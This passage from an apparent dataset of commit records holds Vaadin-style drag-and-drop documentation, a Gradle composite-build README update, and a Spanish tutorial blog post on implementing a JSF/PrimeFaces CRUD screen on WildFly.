accept it.\n[classname]#Or#:: Performs the logical OR operation on two or more client-side criteria; accepts the transferable if any of the given sub-criteria accepts it.\n[classname]#SourceIs#:: Accepts all transferables from any of the given source components\n[classname]#SourceIsTarget#:: Accepts the transferable only if the source component is the same as the target. This criterion is useful for ensuring that items are dragged only within a tree or a table, and not from outside it.\n[classname]#TargetDetailIs#:: Accepts any transferable if the target detail, such as the item of a tree node or table row, is of the given data flavor and has the given value.\n\n\nIn addition, target components such as [classname]#Tree# and [classname]#Table#\ndefine some component-specific client-side accept criteria. See\n<<advanced.dragndrop.treedrop>> for more details.\n\n[classname]#AbstractSelect# defines the following criteria for all selection\ncomponents, including [classname]#Tree# and [classname]#Table#.\n\n[classname]#AcceptItem#:: Accepts only specific items from a specific selection component. The selection component, which must inherit [classname]#AbstractSelect#, is given as the first parameter for the constructor. It is followed by a list of allowed item identifiers in the drag source.\n[classname]#AcceptItem.ALL#:: Accepts all transferables as long as they are items.\n[classname]#TargetItemIs#:: Accepts all drops on the specified target items. The constructor requires the target component ( [classname]#AbstractSelect#) followed by a list of allowed item identifiers.\n[classname]#VerticalLocationIs.MIDDLE#,[classname]#TOP#, and[classname]#BOTTOM#:: The three static criteria accepts drops on, above, or below an item. 
[[advanced.dragndrop.acceptcriteria.server-side]]\n=== Server-Side Criteria\n\nThe __server-side criteria__ are verified on the server side with the\n[methodname]#accept()# method of the [classname]#ServerSideCriterion# class.\nThis allows fully programmable logic for accepting drops, but the downside\nis that it causes a very large number of server requests. A request is made for\nevery target position on which the pointer hovers. This problem is eased in many\ncases by the component-specific lazy loading criteria\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion#. They make the\nserver visit only once for each drag and drop operation and return all accepted rows\nor nodes for the current [classname]#Transferable# at once.\n\nThe [methodname]#accept()# method gets the drag event as a parameter, so it can\nperform its logic much like in [methodname]#drop()#.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n \/\/ Server-side accept criterion that allows drops on any other\n \/\/ location except on nodes that may not have children\n ServerSideCriterion criterion = new ServerSideCriterion() {\n public boolean accept(DragAndDropEvent dragEvent) {\n TreeTargetDetails target = (TreeTargetDetails)\n dragEvent.getTargetDetails();\n\n \/\/ The tree item over which the pointer hovers\n Object targetItemId = target.getItemIdOver();\n\n \/\/ On which side of the target the item is hovered\n VerticalDropLocation location = target.getDropLocation();\n if (location == VerticalDropLocation.MIDDLE)\n if (! tree.areChildrenAllowed(targetItemId))\n return false; \/\/ Not accepted\n\n return true; \/\/ Accept everything else\n }\n };\n return criterion;\n}\n----\n\nThe server-side criteria base class [classname]#ServerSideCriterion# provides a\ngeneric [methodname]#accept()# method. The more specific\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion# are\nconvenience extensions that allow defining the allowed drop targets as a set of\nitems. They also provide some optimization by lazy loading, which reduces server\ncommunication significantly.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n \/\/ Server-side accept criterion that allows drops on any\n \/\/ other tree node except on nodes that may not have children\n TreeDropCriterion criterion = new TreeDropCriterion() {\n @Override\n protected Set<Object> getAllowedItemIds(\n DragAndDropEvent dragEvent, Tree tree) {\n HashSet<Object> allowed = new HashSet<Object>();\n for (Iterator<Object> i =\n tree.getItemIds().iterator(); i.hasNext();) {\n Object itemId = i.next();\n if (tree.hasChildren(itemId))\n allowed.add(itemId);\n }\n return allowed;\n }\n };\n return criterion;\n}\n----\n\n\n[[advanced.dragndrop.acceptcriteria.indicators]]\n=== Accept Indicators\n\nWhen a dragged object hovers on a drop target, an __accept indicator__ is\ndisplayed to show whether or not the location is accepted. For the\n[parameter]#MIDDLE# location, the indicator is a box around the target (tree\nnode, table row, or component). 
For vertical drop locations, the accepted\nlocations are shown as horizontal lines, and for horizontal drop locations as\nvertical lines.\n\nFor [classname]#DragAndDropWrapper# drop targets, you can disable the accept\nindicators or __drag hints__ with the [parameter]#no-vertical-drag-hints#,\n[parameter]#no-horizontal-drag-hints#, and [parameter]#no-box-drag-hints#\nstyles. You need to add the styles to the __layout that contains__ the wrapper,\nnot to the wrapper itself.\n\n\n[source, java]\n----\n\/\/ Have a wrapper\nDragAndDropWrapper wrapper = new DragAndDropWrapper(c);\nlayout.addComponent(wrapper);\n\n\/\/ Disable the hints\nlayout.addStyleName(\"no-vertical-drag-hints\");\nlayout.addStyleName(\"no-horizontal-drag-hints\");\nlayout.addStyleName(\"no-box-drag-hints\");\n----\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop.acceptcriteria\")))\n\n[[advanced.dragndrop.dragging]]\n== Dragging Components\n\nDragging a component requires wrapping the source component within a\n[classname]#DragAndDropWrapper#. You can then allow dragging by putting the\nwrapper (and the component) in drag mode with [methodname]#setDragStartMode()#.\nThe method supports two drag modes: [parameter]#DragStartMode.WRAPPER# and\n[parameter]#DragStartMode.COMPONENT#, which define whether the entire wrapper\nor just the wrapped component is shown as the drag image while dragging.\n\n\n[source, java]\n----\n\/\/ Have a component to drag\nfinal Button button = new Button(\"An Absolute Button\");\n\n\/\/ Put the component in a D&D wrapper and allow dragging it\nfinal DragAndDropWrapper buttonWrap = new DragAndDropWrapper(button);\nbuttonWrap.setDragStartMode(DragStartMode.COMPONENT);\n\n\/\/ Set the wrapper to wrap tightly around the component\nbuttonWrap.setSizeUndefined();\n\n\/\/ Add the wrapper, not the component, to the layout\nlayout.addComponent(buttonWrap, \"left: 50px; top: 50px;\");\n----\n\nThe default height of [classname]#DragAndDropWrapper# is undefined, but the\ndefault width is 100%. If you want to ensure that the wrapper fits tightly\naround the wrapped component, you should call [methodname]#setSizeUndefined()#\nfor the wrapper. When doing so, make sure that the wrapped component does\nnot have a relative size, which would cause a paradox.\n\nDragged components are referenced in the [classname]#WrapperTransferable#. You\ncan get the reference to the dragged component with\n[methodname]#getDraggedComponent()#. The method will return [literal]#++null++#\nif the transferable is not a component. HTML 5 drags (described later) are also\ncarried in wrapper transferables.\n\n\n[[advanced.dragndrop.drop-on-component]]\n== Dropping on a Component\n\nDrops on a component are enabled by wrapping the component in a\n[classname]#DragAndDropWrapper#. The wrapper is an ordinary component; the\nconstructor takes the wrapped component as a parameter. You just need to define\nthe [classname]#DropHandler# for the wrapper with\n[methodname]#setDropHandler()#.\n\nIn the following example, we allow moving components in an absolute layout.\nDetails on the drop handler are given later.\n\n\n[source, java]\n----\n\/\/ A layout that allows moving its contained components\n\/\/ by dragging and dropping them\nfinal AbsoluteLayout absLayout = new AbsoluteLayout();\nabsLayout.setWidth(\"100%\");\nabsLayout.setHeight(\"400px\");\n\n... 
put some (wrapped) components in the layout ...\n\n\/\/ Wrap the layout to allow handling drops\nDragAndDropWrapper layoutWrapper =\n new DragAndDropWrapper(absLayout);\n\n\/\/ Handle moving components within the AbsoluteLayout\nlayoutWrapper.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n\n public void drop(DragAndDropEvent event) {\n ...\n }\n});\n----\n\n[[advanced.dragndrop.drop-on-component.details]]\n=== Target Details for Wrapped Components\n\nThe drop handler receives the drop target details in a\n[classname]#WrapperTargetDetails# object, which implements the\n[classname]#TargetDetails# interface.\n\n\n[source, java]\n----\npublic void drop(DragAndDropEvent event) {\n WrapperTransferable t =\n (WrapperTransferable) event.getTransferable();\n WrapperTargetDetails details =\n (WrapperTargetDetails) event.getTargetDetails();\n----\n\nThe wrapper target details include a [classname]#MouseEventDetails# object,\nwhich you can get with [methodname]#getMouseEvent()#. You can use it to get the\nmouse coordinates for the position where the mouse button was released and the\ndrag ended. Similarly, you can find out the drag start position from the\ntransferable object (if it is a [classname]#WrapperTransferable#) with\n[methodname]#getMouseDownEvent()#.\n\n\n[source, java]\n----\n\/\/ Calculate the drag coordinate difference\nint xChange = details.getMouseEvent().getClientX()\n - t.getMouseDownEvent().getClientX();\nint yChange = details.getMouseEvent().getClientY()\n - t.getMouseDownEvent().getClientY();\n\n\/\/ Move the component in the absolute layout\nComponentPosition pos =\n absLayout.getPosition(t.getSourceComponent());\npos.setLeftValue(pos.getLeftValue() + xChange);\npos.setTopValue(pos.getTopValue() + yChange);\n----\n\nYou can get the absolute x and y coordinates of the target wrapper with\n[methodname]#getAbsoluteLeft()# and [methodname]#getAbsoluteTop()#, which allow\nyou to translate the absolute mouse coordinates to coordinates relative to the\nwrapper. Notice that the coordinates are really the position of the wrapper, not\nthe wrapped component; the wrapper reserves some space for the accept\nindicators.\n\nThe [methodname]#verticalDropLocation()# and\n[methodname]#horizontalDropLocation()# methods return the more detailed drop\nlocation in the target.\n\n\n\n[[advanced.dragndrop.external]]\n== Dragging Files from Outside the Browser\n\nThe [classname]#DragAndDropWrapper# allows dragging files from outside the\nbrowser and dropping them on a component wrapped in the wrapper. Dropped files\nare automatically uploaded to the application and can be acquired from the\nwrapper with [methodname]#getFiles()#. The files are represented as\n[classname]#Html5File# objects, as defined in the inner class. You can define an\nupload [classname]#Receiver# to receive the content of a file to an\n[classname]#OutputStream#.\n\n
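The following minimal sketch outlines how the dropped files could be received in the [methodname]#drop()# method of the wrapper's drop handler; where the received content is written is up to the application.\n\n[source, java]\n----\npublic void drop(DragAndDropEvent event) {\n WrapperTransferable t =\n (WrapperTransferable) event.getTransferable();\n\n Html5File[] files = t.getFiles();\n if (files != null) {\n for (Html5File file : files) {\n \/\/ Receive the file content through a stream variable\n file.setStreamVariable(new StreamVariable() {\n public OutputStream getOutputStream() {\n return new ByteArrayOutputStream(); \/\/ or a file stream, etc.\n }\n public boolean listenProgress() { return false; }\n public void onProgress(StreamingProgressEvent event) {}\n public void streamingStarted(StreamingStartEvent event) {}\n public void streamingFinished(StreamingEndEvent event) {}\n public void streamingFailed(StreamingErrorEvent event) {}\n public boolean isInterrupted() { return false; }\n });\n }\n }\n}\n----\n\n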
Dragging and dropping files to the browser is supported in HTML 5 and requires a\ncompatible browser, such as Mozilla Firefox 3.6 or newer.\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop\")))\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5abfd0d7e527cf49d58c409b518acd3241a67f72","subject":"Update docs re: executing tasks in included builds.","message":"Update docs re: executing tasks in included builds.\n","repos":"gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/samples\/build-organization\/composite-builds\/basic\/README.adoc","new_file":"subprojects\/docs\/src\/samples\/build-organization\/composite-builds\/basic\/README.adoc","new_contents":"NOTE: You can open this sample inside an IDE using the https:\/\/www.jetbrains.com\/help\/idea\/gradle.html#gradle_import_project_start[IntelliJ native importer] or https:\/\/projects.eclipse.org\/projects\/tools.buildship[Eclipse Buildship].\n\n== Defining and using a composite build\n\nThis sample shows how two Gradle builds that are normally developed separately and combined using binary integration can be wired together into a composite build with source integration. The `my-utils` multiproject build produces two different Java libraries, and the `my-app` build produces an executable using functions from those libraries.\n\nNote that the `my-app` build does not have direct dependencies on `my-utils`. Instead, it declares module dependencies on the libraries produced by `my-utils`:\n\n====\ninclude::sample[dir=\"groovy\",files=\"my-app\/app\/build.gradle[tags=app_dependencies]\"]\ninclude::sample[dir=\"kotlin\",files=\"my-app\/app\/build.gradle.kts[tags=app_dependencies]\"]\n====\n\n== Using command-line composite build\n\nWhen using a composite build, no shared repository is required for the builds, and no changes need to be made to the build scripts.\n\n1. Change the sources of `Number.java`\n2. 
Run the `my-app` application, including the `my-utils` build.\n\n```\ncd my-app\ngradle --include-build ..\/my-utils run\n```\n\nUsing _dependency substitution_, the module dependencies on the util libraries are replaced by project dependencies on `my-utils`.\n\n== Converting `my-app` to a composite build\n\nIt's possible to make the above arrangement persistent, by making `my-app` a composite build that includes `my-utils`.\n\n```\ncd my-app\necho \"includeBuild '..\/my-utils'\" >> settings.gradle\ngradle run\n```\n\nWith this configuration, the module dependencies from `my-app` to `my-utils` will always be substituted with project dependencies.\n\nWhile simple, this approach has the downside of modifying the `my-app` build.\n\n== Using separate composite build\n\nIt is also possible to create a separate composite build that includes both the `my-app` and `my-utils` builds.\n\n====\ninclude::sample[dir=\"groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nAfter doing so, you can reference included builds directly on the command line in order to execute tasks in them.\n\n```\ngradle :my-app:app:run\n```\n\nIt is also possible to create delegating tasks in the composite project.\n\n====\ninclude::sample[dir=\"groovy\",files=\"build.gradle[tags=run]\"]\ninclude::sample[dir=\"kotlin\",files=\"build.gradle.kts[tags=run]\"]\n====\n\n```\ngradle run\n```\n","old_contents":"NOTE: You can open this sample inside an IDE using the https:\/\/www.jetbrains.com\/help\/idea\/gradle.html#gradle_import_project_start[IntelliJ native importer] or https:\/\/projects.eclipse.org\/projects\/tools.buildship[Eclipse Buildship].\n\n== Defining and using a composite build\n\nThis sample shows how two Gradle builds that are normally developed separately and combined using binary integration can be wired together into a composite build with source integration. The `my-utils` multiproject build produces two different Java libraries, and the `my-app` build produces an executable using functions from those libraries.\n\nNote that the `my-app` build does not have direct dependencies on `my-utils`. Instead, it declares module dependencies on the libraries produced by `my-utils`:\n\n====\ninclude::sample[dir=\"groovy\",files=\"my-app\/app\/build.gradle[tags=app_dependencies]\"]\ninclude::sample[dir=\"kotlin\",files=\"my-app\/app\/build.gradle.kts[tags=app_dependencies]\"]\n====\n\n== Using command-line composite build\n\nWhen using a composite build, no shared repository is required for the builds, and no changes need to be made to the build scripts.\n\n1. Change the sources of `Number.java`\n2. 
Run the `my-app` application, including the `my-utils` build.\n\n```\ncd my-app\ngradle --include-build ..\/my-utils run\n```\n\nUsing _dependency substitution_, the module dependencies on the util libraries are replaced by project dependencies on `my-utils`.\n\n== Converting `my-app` to a composite build\n\nIt's possible to make the above arrangement persistent, by making `my-app` a composite build that includes `my-utils`.\n\n```\ncd my-app\necho \"includeBuild '..\/my-utils'\" >> settings.gradle\ngradle run\n```\n\nWith this configuration, the module dependencies from `my-app` to `my-utils` will always be substituted with project dependencies.\n\nWhile simple, this approach has the downside of modifying the `my-app` build.\n\n== Using separate composite build\n\nIt is also possible to create a separate composite build that includes both the `my-app` and `my-utils` builds.\n\n====\ninclude::sample[dir=\"groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nNote that it is not yet possible to execute tasks in an included build from the command line. Instead, the build user must create delegating tasks in the composite.\n\n====\ninclude::sample[dir=\"groovy\",files=\"build.gradle[tags=run]\"]\ninclude::sample[dir=\"kotlin\",files=\"build.gradle.kts[tags=run]\"]\n====\n\n```\ngradle run\n```\n\nWe are working on a mechanism to permit tasks in included builds to be referred to directly on the command line. Stay tuned!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7250281b3985bb49f8b35b394ee4af77b35ec2c2","subject":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","message":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_contents":"= Implementaci\u00f3n de un CRUD: La pantalla de Gesti\u00f3n de Trabajos.\nLa metaweb\n:hp-tags: JSF, JavaServer Faces, CRUD, EJB, Hibernate, backing bean, Git, GitHub\n:published_at: 2015-07-23\n\nEn este post os resumo los aspectos m\u00e1s relevantes de la implementaci\u00f3n del caso de uso de introducci\u00f3n de Trabajos de Drones creado a partir de la solicitud de dicha funcionalidad por parte de nuestro cliente imaginario, TAS. La release de la que se parte es la 1.0.1, y a la que llegaremos ser\u00e1 la 1.1.x. As\u00ed que usad la primera para intertar implementar la pantalla por vuestra cuenta y la segunda para ver la impleme taci\u00f3n terminada.\n\nYo aqu\u00ed os har\u00e9 una serie de comentarios sobre la release 1.1.x, se\u00f1alando los detalles de implementaci\u00f3n interesantes. Pero primero una breve introducci\u00f3n sobr\u00e9 qu\u00e9 es un mantenimiento de una entidad del modelo de dominio. En ingl\u00e9s se conoce como CRUD: Create, Read\/Retrieve, Update, Delete, y se refiere al conjunto de elementos de dise\u00f1o y programa necesarios para implementar el t\u00edpico mantenimiento de una entidad. El caso m\u00e1s sencillo se da cuando la entidad es una entidad \"hoja\" en nuestro diagrama de clases. Si la entidad tiene una o m\u00e1s relaciones con otras entidades tendremos, en ocasiones, que mantenerlas tambi\u00e9n en el CRUD. 
Recordemos nuestro sencillo diagrama de clases:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/003\/post003-fig045.png[]\n\n\u00bfQu\u00e9 mantenimientos podr\u00edamos hacer aqu\u00ed? Bueno, en este caso tienen sentido dos mantenimientos. El que vamos a implementar, de la entidad Trabajo, donde tendremos que mantener la relaci\u00f3n desde Trabajo hacia Drone, que representa la selecci\u00f3n del drone que va a llevar a cabo el trabajo, y la relaci\u00f3n del trabajo con sus puntos de ruta, que representa la ruta que seguir\u00e1 el drone en ese trabajo. Y por otro lado tambi\u00e9n cabe realizar un CRUD de la entidad Drone donde no cabe el mantenimiento de la relaci\u00f3n desde Drone a Trabajo ya que cuando por ejemplo creamos un drone no tiene sentido en nuestro caso asignarle en el mismo caso o en otro diferente uno o m\u00e1s trabajos.\n\nCentr\u00e1ndonos en el mantenimiento de la entidad Trabajo empecemos con su resoluci\u00f3n. Por partes, hacemos primero un an\u00e1lisis, luego el dise\u00f1o de la interfaz y por \u00faltimo vemos la implementaci\u00f3n de cada capa.\n\nLa lista de requisitos extraida de la entrevista con el cliente es la siguiente:\n\n.Lista de requisitos del mantenimiento de trabajos\n[width=\"90%\"]\n|===\n|[small]*Pantalla de listado de trabajos*\n|[small]#Inicialmente se presentar\u00e1 un listado de trabajos en pantalla.#\n|[small]#El listado se debe ordenar por todos sus campos y se presentar\u00e1 paginado.#\n|[small]#Sobre el listado dispondremos de comandos para Editar, dar de baja y dar de baja definitiva un trabajo.#\n|[small]#La baja definitiva debe ser confirmada.#\n|[small]*Pantalla de mantenimiento de trabajo*\n|[small]#Todos los campos se validar\u00e1n presentando mensajes adecuados.#\n|[small]#Se presentar\u00e1 un listado de los drones disponibles seg\u00fan la fecha del trabajo.#\n|[small]#La ruta se importar\u00e1 desde un excel generado por la aplicaci\u00f3n de gesti\u00f3n de mapas usada para la definici\u00f3n de rutas sobre mapa.#\n|===\n\nPosteriormente a la definici\u00f3n de los requisitos decidimos si usar o no una librer\u00eda JSF espec\u00edfica que nos aporte capacidades adicionales en la capa de presentaci\u00f3n. Nuestras pantallas usar\u00e1n listados con capacidades de ordenaci\u00f3n, paginaci\u00f3n, etc. Adem\u00e1s necesitamos acciones con confirmaci\u00f3n. El coste de incluir la librer\u00eda es muy bajo y finalmente optamos por incluir una en nuestro proyecto. Entre RichFaces y Primefaces elegimos la segunda por sus caracter\u00edsticas en cuanto a n\u00famero de componentes, curva de aprindizaje, documentaci\u00f3n, comunidad y tendencia exponencial de incremento en el uso en nuevos proyectos.\n\nNOTE: Si quer\u00e9is comparar la popularidad de distintas tecnolog\u00edas usad Google Trends. Tendr\u00e9is que a\u00f1adir los t\u00e9rminos que identifiquen a cada tecnolog\u00eda. Y hay que cuidar que el t\u00e9rmino no recoja resultados no deseados. Por ejmeplo si quer\u00e9is ver la tendencia del framework ionic para aplicaciones h\u00edbridas escribir \"ionic framework\" y no \"ionic\" a secas. La URL es https:\/\/www.google.es\/trends[\u00e9sta]. \n\nA\u00f1adimos PrimeFaces al proyecto. Adem\u00e1s, optamos por trabajar con la \u00faltima versi\u00f3n de JSF. La versi\u00f3n que trae EAP 6.3 es la 2.1. Se ha intentado seguir el procedimiento existente en la web para incluir la \u00faltima versi\u00f3n en este servidor pero no ha sido posible. 
In short, the process consists of downloading a Maven application from Github that generates a CLI file which deploys the three slots for the three modules affected by the update. However, one of the slots causes problems, since the script seems to be updated to work with the initial versions of the Wildfly server and not with EAP.\n\nSo we choose to adopt the new Wildfly server in its latest version, 9.0.1, and thus have a complete Java EE 7 platform available. The first thing is to download the server installation file http:\/\/wildfly.org\/downloads\/[here]. You have to choose the first of the options, the one with version 9.0.1.Final.\n\nNOTE: Download the Quickstarts as well, because they will be very useful as reference material in the initial stages of the implementation of any new project, whatever its nature.\n\nBefore using the server we must add a user. To do so we have to run the batch file bin\\add-user.bat. A dialog appears and, after several questions, the user is created.\n\nOnce WildFly is installed we add it to Eclipse as a new runtime. Our version of the JBoss Tools only offered an adapter for version 8 of the server, but after the start and stop tests it seems that for simple use we will have no problems with this.\n\nNOTE: If you have not done it yet, put the project under Git version control and create the corresponding remote repository on GitHub to publish your releases. \n\nWhat changes will we have to make to our project after the server change and the upgrade of the technology versions? First of all we will have to adapt the Maven dependencies to those of the new server, a process without much complication. To review the code changes made during this post, download release 1.1.x from https:\/\/github.com\/lametaweb\/jdrone\/archive\/1.1.0.zip[this address].\n\nTaking advantage of the fact that pom.xml has changed, I have refactored the build cycle so that there is now a \"despliegue-recursos\" profile that must be run the first time we deploy the application, or if the resources have been removed for any reason. I did this to avoid the problems caused by the locking of the database. You have to create a new run configuration: right-click the project > Run As > Run Configurations... > right-click Maven build > New > in the Goals field type \"clean install -Pdespliegue-recursos\" and give the new profile a name.\n\nSecondly, since we are going to move up from JSF 2.1 to 2.2, we update the namespaces in the root node of the _faces-config.xml_ file. We will also have to update the JavaServer Faces facet. We untick it, wait for it to uninstall, and tick it again. 
When adding it back, leave the _JSF Implementation Library_ option as _Type > Disable Library Configuration_.\n\nTo check that JSF 2.2 works correctly we modify our index.xhtml page to adapt it to HTML5 and JSF 2.2, also adding a tag that is new in version 2.2.\n\nFor the HTML 5 adaptation:\n\n`<!DOCTYPE html>`\n\nFor the JSF 2.2 adaptation we change the namespaces:\n\n`<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n\txmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\"\n\txmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">`\n\nFinally we replace:\n\n`<f:event listener=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" type=\"preRenderView\" \/>`\n\nwith:\n\n`<f:viewAction action=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" onPostback=\"true\"><\/f:viewAction>`\n\nAlso, the typical `&nbsp;` spacing entities are no longer accepted, and we have to replace them with the equivalent numeric character reference `&#160;`.\n\nNOTE: The viewAction tag is new in JSF 2.2. It associates an event with a page, and its use is more flexible than that of the event tag for actions that preload screen data. On our initial screen the usage does not follow the usual pattern. A more appropriate use will be seen in the implementation of the job maintenance screens.\n\n
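On the Java side, a view action simply points to a public method of the backing bean that preloads the screen data. A minimal sketch of the pattern could be the following; the DroneFacade name, the fecha field and the findDisponiblesEnFecha() finder are hypothetical names used for illustration, and only the bean and method names come from the page:\n\n[source,java,indent=0]\n----\n@Named\n@RequestScoped\npublic class DisponibilidadBean {\n\n\t@Inject\n\tprivate DroneFacade droneFacade; \/\/ business bean for the Drone entity\n\n\tprivate Date fecha; \/\/ bound to the date field of the form\n\tprivate List<Drone> drones; \/\/ listing model read by the page\n\n\t\/\/ Invoked by <f:viewAction> before the view is rendered\n\tpublic void listaEstadoDronesPorFecha() {\n\t\tdrones = droneFacade.findDisponiblesEnFecha(fecha); \/\/ hypothetical finder\n\t}\n\n\t\/\/ getters and setters omitted\n}\n----\n\n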
Very well, once we have the working environment correctly updated, we begin implementing the proposed use case. As always, we will have to implement the presentation and business layers. Let's start with the first one.\n\nBefore starting with the first screen we have to create a template that provides the layout of the application screens. Primefaces gives us the solution with Grid CSS, a style library with which we will create a responsive layout in the style of Bootstrap. Before starting the implementation we draw a sketch of the layout to be clear about the divs we have to consider.\n\nThe template must be private, so it is placed inside the _WEB-INF_ folder. A template will contain, in its header, elements common to all the pages, such as client cache management and common CSS styles, and in its body the page layout, with the Facelets <ui:insert...> tags inside each div element (with Grid CSS styles) to insert the content.\n\nOnce our template is ready, in the folder _\/jdrone\/src\/main\/webapp\/WEB-INF\/plantillas\/plantilla.xhtml_, together with its corresponding style sheet, we can start implementing each screen of the application based on the template.\n\nThe structure of a page will be:\n\n[source,xhtml,indent=0]\n----\n\t<ui:composition...>\n \t<ui:define name=\"central\">\n \t...\n <\/ui:define>\n <ui:define name=\"logo\">\n \t\t<ui:include... \/>\n <\/ui:define>\n ...\n <\/ui:composition>\n----\n\nThe content of the variable zone, labeled with the name _central_ in the template, is generally defined at the beginning of the page, for clarity, since the order does not matter here. Since the logo zone will be fixed for all screens, we implement it in a separate panel (a private xhtml page) and add it with an include that points to the panel.\n\nFirst of all we adapt our query screen from the previous posts, the one listing the drones available on a date, to the use of the template, and we move the content from the index.xhtml file, which will now become the initial screen, to the consulta-inicial.xhtml file.\n\nWe implement the logo panel and include a simple jQuery animation. Primefaces is based on this Javascript library, which is worth knowing since it is widely used in the presentation layer of real projects. As our project includes Primefaces, and Primefaces embeds jQuery, we do not have to add the library explicitly. In general, for any project, on pages that do not use any Primefaces tag we would include the jQuery library embedded in Primefaces explicitly with the following lines:\n\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery.js\" target=\"head\" \/>`\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery-plugins.js\" target=\"head\" \/>`\n\nThe next thing we need is an options menu. We opt for the classic menu bar. As usually happens when we need some element for the presentation layer, Primefaces again gives us the solution, with the MenuBar component. Bear in mind that version 5.2, open to the community and used in our program, has almost 150 components and a great number of additional features. We draw the options and submenus planned for the application and implement the menu in a new panel, in the same way as in the case of the logo.\n\nWe start the server and run our build cycle to see how everything looks on screen. Personally I am not convinced by the default look of the menu, so we turn to Primefaces again to change the Theme. While we are at it, we activate the FontAwesome icons by adding the corresponding parameter in the _web.xml_ file, to have a wider range of icons to choose from.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig005.png[]\n\nTo change the Theme we have to add a Maven dependency; we choose the bluesky Theme, more in line with the company brand:\n\n[source,xml,indent=0]\n----\n <dependency>\n <groupId>org.primefaces.themes<\/groupId>\n <artifactId>bluesky<\/artifactId>\n <version>1.0.10<\/version>\n <\/dependency>\n----\n\nAnd add a parameter in the deployment descriptor, web.xml:\n\n[source,xml,indent=0]\n----\n <context-param>\n <param-name>primefaces.THEME<\/param-name>\n <param-value>bluesky<\/param-value>\n <\/context-param>\n----\n\nWe save the changes. If we open the pom.xml file we see that an error is shown on the added dependency; this is because this dependency is not in the Central repository. We therefore have to add the Primefaces repository to our configuration. We can do it directly from the suggestion that Eclipse shows when we place the mouse pointer over the error. 
Enter the data exactly as it appears in the following figure:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig010.png[]\n\nWe press OK and Finish. To fine-tune the style of the menu bar even further we can modify the style applied by the framework to the components that make up the menu. These styles appear in the Primefaces documentation, but the most practical thing is to use the developer tools of Chrome or Firefox to easily locate the styles applied to each element on the screen itself and edit them to see the changes _on the fly_.\n\n\nAdd the following at the beginning of the _plantilla.css_ file: \n\n[source,css,indent=0]\n----\n.ui-menubar{\n\theight: 1.8em;\n\tpadding: 0em !important;\n}\n.ui-menuitem{\n\theight: 1.8em;\n}\n----\n\nDeploy the changes on WildFly and check that the new look of the screen is similar to this one:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig015.png[]\n\nNOTE: There is a very interesting tool that avoids redeployments on the development server while implementing an application: JRebel, http:\/\/zeroturnaround.com\/software\/jrebel\/. It is a commercial tool, but it is worth downloading the demo version and evaluating whether to include it in our set of plugins.\n\nRight, to leave the application ready for the implementation of the two \"Job management\" screens, we move the content of index.xhtml to consulta-inicial.xhtml and leave index.xhtml with a clean background as the initial screen of the application, adding a background image.\n\nWe start by adding the page that shows us the list of jobs. We have to add to each item a button to delete it and another to modify it. In addition, each item will have a link to view the details of the job. Finally, at page level we will have a button to create a new job and another to return to the initial screen.\n\nWe create the trabajos.xhtml page from index.xhtml. We will write the necessary code inside the define of the \"central\" area. Next we create the backing bean for the page, TrabajosBean.java, in the same folder as DisponibilidadBean.java. \n\nThe scope of the backing bean must extend to the view scope, ViewScoped. This is necessary because on this page we are going to implement actions that call methods with parameters, and for this EL (Expression Language) construct to be possible the bean must remain in memory beyond the scope of the request.\n\nNOTE: Be careful to choose the right ViewScoped class after pressing Ctrl + O. We have to choose javax.faces.view.ViewScoped and not javax.faces.bean.ViewScoped. The former is new in JSF 2.2 and fully compatible with CDI.\n\n
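As a reference, this is a minimal skeleton of a view-scoped CDI backing bean; note that view-scoped CDI beans should implement Serializable, since they may be passivated between requests (the listing further below still shows a first, request-scoped iteration of the bean):\n\n[source,java,indent=0]\n----\nimport java.io.Serializable;\n\nimport javax.faces.view.ViewScoped; \/\/ the JSF 2.2, CDI-compatible scope\nimport javax.inject.Named;\n\n@Named\n@ViewScoped\npublic class TrabajosBean implements Serializable {\n\n\tprivate static final long serialVersionUID = 1L;\n\n\t\/\/ actions with parameters can be called from EL because\n\t\/\/ the bean outlives a single request\n}\n----\n\n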
